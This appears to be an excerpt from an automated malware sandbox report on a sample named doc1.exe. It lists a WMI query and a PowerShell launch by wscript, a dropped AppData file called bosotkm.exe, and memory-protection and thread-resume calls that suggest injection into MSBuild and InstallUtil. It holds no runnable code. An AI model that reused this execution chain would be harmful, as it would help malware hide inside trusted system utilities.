                  Source: C:\Windows\System32\wscript.exe; COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                  Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                  Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Users\user\Desktop\doc1.exe; Code function: 1_2_057FD5A0 NtResumeThread, 1_2_057FD5A0
                  Source: C:\Users\user\Desktop\doc1.exe; Code function: 1_2_057FC0A8 NtProtectVirtualMemory, 1_2_057FC0A8
                  Source: C:\Users\user\Desktop\doc1.exe; Code function: 1_2_057FD598 NtResumeThread, 1_2_057FD598
                  Source: C:\Users\user\Desktop\doc1.exe; Code function: 1_2_057FD68F NtResumeThread, 1_2_057FD68F
                  Source: C:\Users\user\Desktop\doc1.exe; Code function: 1_2_057FC1C8 NtProtectVirtualMemory, 1_2_057FC1C8
                  Source: C:\Users\user\Desktop\doc1.exe; Code function: 1_2_057FC0A0 NtProtectVirtualMemory, 1_2_057FC0A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 11_2_05E3D5A0 NtResumeThread, 11_2_05E3D5A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 11_2_05E3C0A8 NtProtectVirtualMemory, 11_2_05E3C0A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 11_2_05E3D598 NtResumeThread, 11_2_05E3D598
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 11_2_05E3D550 NtResumeThread, 11_2_05E3D550
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 11_2_05E3C0A0 NtProtectVirtualMemory, 11_2_05E3C0A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 18_2_060BD5A0 NtResumeThread, 18_2_060BD5A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 18_2_060BC0A8 NtProtectVirtualMemory, 18_2_060BC0A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 18_2_060BD598 NtResumeThread, 18_2_060BD598
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe; Code function: 18_2_060BC0A0 NtProtectVirtualMemory, 18_2_060BC0A0
                  Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3706011_2_05E37060
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3F84311_2_05E3F843
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3925011_2_05E39250
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3479111_2_05E34791
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3868011_2_05E38680
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3869011_2_05E38690
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3B1A011_2_05E3B1A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3C0A011_2_05E3C0A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3704F11_2_05E3704F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E3924111_2_05E39241
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E4004011_2_05E40040
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E4E81011_2_05E4E810
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E4001311_2_05E40013
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5041811_2_05E50418
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5805011_2_05E58050
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E504BB11_2_05E504BB
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5040A11_2_05E5040A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5C9A011_2_05E5C9A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5C9B011_2_05E5C9B0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5093A11_2_05E5093A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5091011_2_05E50910
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E510E911_2_05E510E9
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E510F811_2_05E510F8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5804111_2_05E58041
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E5133911_2_05E51339
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_05E512A811_2_05E512A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_060DCE9811_2_060DCE98
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_060C000611_2_060C0006
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_060C004011_2_060C0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0103DD2412_2_0103DD24
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_01749AC818_2_01749AC8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_017461E818_2_017461E8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0174634018_2_01746340
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_017458F018_2_017458F0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_017458E118_2_017458E1
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602EC3818_2_0602EC38
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602698818_2_06026988
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_06026F6818_2_06026F68
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602549218_2_06025492
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060254A018_2_060254A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602C5B618_2_0602C5B6
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602FA8118_2_0602FA81
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602FA9018_2_0602FA90
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602000618_2_06020006
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602004018_2_06020040
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0602697918_2_06026979
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060A055718_2_060A0557
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060A177018_2_060A1770
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060A088F18_2_060A088F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B06B818_2_060B06B8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B925018_2_060B9250
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BF84318_2_060BF843
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B706018_2_060B7060
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B868018_2_060B8680
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B869018_2_060B8690
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B479118_2_060B4791
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B924118_2_060B9241
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060B704F18_2_060B704F
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BC0A018_2_060BC0A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060BB1A018_2_060BB1A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060C001E18_2_060C001E
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060CE81018_2_060CE810
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060C004018_2_060C0040
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D041818_2_060D0418
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D805018_2_060D8050
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D040B18_2_060D040B
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D04BB18_2_060D04BB
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D12A818_2_060D12A8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D133918_2_060D1339
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D804118_2_060D8041
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D10E918_2_060D10E9
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D10F818_2_060D10F8
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D091018_2_060D0910
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060D093A18_2_060D093A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060DC9A018_2_060DC9A0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_060DC9B018_2_060DC9B0
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0635CE9818_2_0635CE98
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0634001A18_2_0634001A
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 18_2_0634004018_2_06340040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0B32821_2_02A0B328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0C19021_2_02A0C190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0610821_2_02A06108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0F77821_2_02A0F778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0C75321_2_02A0C753
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0E43121_2_02A0E431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0C47021_2_02A0C470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A04AD921_2_02A04AD9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0CA3321_2_02A0CA33
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0688021_2_02A06880
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0985821_2_02A09858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0BEB021_2_02A0BEB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0D7E021_2_02A0D7E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0D7F021_2_02A0D7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_02A0357321_2_02A03573
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577758821_2_05777588
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05777E7821_2_05777E78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577D1C021_2_0577D1C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F8D821_2_0577F8D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577328821_2_05773288
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05777D7E21_2_05777D7E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05770D6021_2_05770D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577CD6821_2_0577CD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05770D5021_2_05770D50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577CD5821_2_0577CD58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05776DF721_2_05776DF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F47121_2_0577F471
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577BC0821_2_0577BC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C4B821_2_0577C4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_057704A021_2_057704A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C4A821_2_0577C4A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577049121_2_05770491
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F48021_2_0577F480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577E77821_2_0577E778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577E76821_2_0577E768
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577AF0021_2_0577AF00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577B7B021_2_0577B7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577B7A021_2_0577B7A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_057777A821_2_057777A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577D61821_2_0577D618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_05776E0021_2_05776E00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577D60921_2_0577D609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577AEEF21_2_0577AEEF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577DEC821_2_0577DEC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577DEB821_2_0577DEB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C91021_2_0577C910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C90321_2_0577C903
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577090021_2_05770900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577D1B021_2_0577D1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C06021_2_0577C060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577C05021_2_0577C050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577004021_2_05770040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F02821_2_0577F028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F01821_2_0577F018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577000721_2_05770007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_057708F021_2_057708F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577F8C921_2_0577F8C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577B35821_2_0577B358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577B34821_2_0577B348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577E32021_2_0577E320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577E31021_2_0577E310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577BBF821_2_0577BBF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577EBD021_2_0577EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577EBC121_2_0577EBC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577DA7021_2_0577DA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577327821_2_05773278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0577DA6321_2_0577DA63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665A60021_2_0665A600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665BF3021_2_0665BF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06659FB021_2_06659FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665AC4821_2_0665AC48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665745021_2_06657450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06650D4821_2_06650D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066585B021_2_066585B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665C58021_2_0665C580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665D21821_2_0665D218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665B29021_2_0665B290
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06658BF921_2_06658BF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665CBD021_2_0665CBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665B8E021_2_0665B8E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06655E6021_2_06655E60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06655E7021_2_06655E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066536D821_2_066536D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665672021_2_06656720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665BF2021_2_0665BF20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665671321_2_06656713
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06656FF121_2_06656FF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06656FF821_2_06656FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06659FA021_2_06659FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665743F21_2_0665743F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665AC3821_2_0665AC38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06657CF021_2_06657CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665048821_2_06650488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665049821_2_06650498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665C57021_2_0665C570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06650D3921_2_06650D39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06657D0021_2_06657D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665A5F021_2_0665A5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066555C021_2_066555C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066585AB21_2_066585AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066555B321_2_066555B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06655A0821_2_06655A08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665D20A21_2_0665D20A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06655A1821_2_06655A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066562C821_2_066562C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066562BB21_2_066562BB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665B28121_2_0665B281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665336021_2_06653360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06656B6921_2_06656B69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_06656B7821_2_06656B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665335021_2_06653350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665CBC021_2_0665CBC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066543D821_2_066543D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665004021_2_06650040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665284821_2_06652848
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665285821_2_06652858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665000621_2_06650006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066508E121_2_066508E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066508F021_2_066508F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665B8D021_2_0665B8D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_066578A821_2_066578A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665789821_2_06657898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665514021_2_06655140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665814821_2_06658148
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665815821_2_06658158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 21_2_0665513321_2_06655133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_0184DD2422_2_0184DD24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D610826_2_013D6108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DC19026_2_013DC190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DB32826_2_013DB328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DE43126_2_013DE431
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DC47026_2_013DC470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DF77826_2_013DF778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DC75226_2_013DC752
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D985826_2_013D9858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D688026_2_013D6880
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DBBB826_2_013DBBB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DCA3226_2_013DCA32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D4AD926_2_013D4AD9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DBEB026_2_013DBEB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013D357226_2_013D3572
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DB4F226_2_013DB4F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DD7F026_2_013DD7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_013DD7E026_2_013DD7E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_06887E7826_2_06887E78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_068877A826_2_068877A8
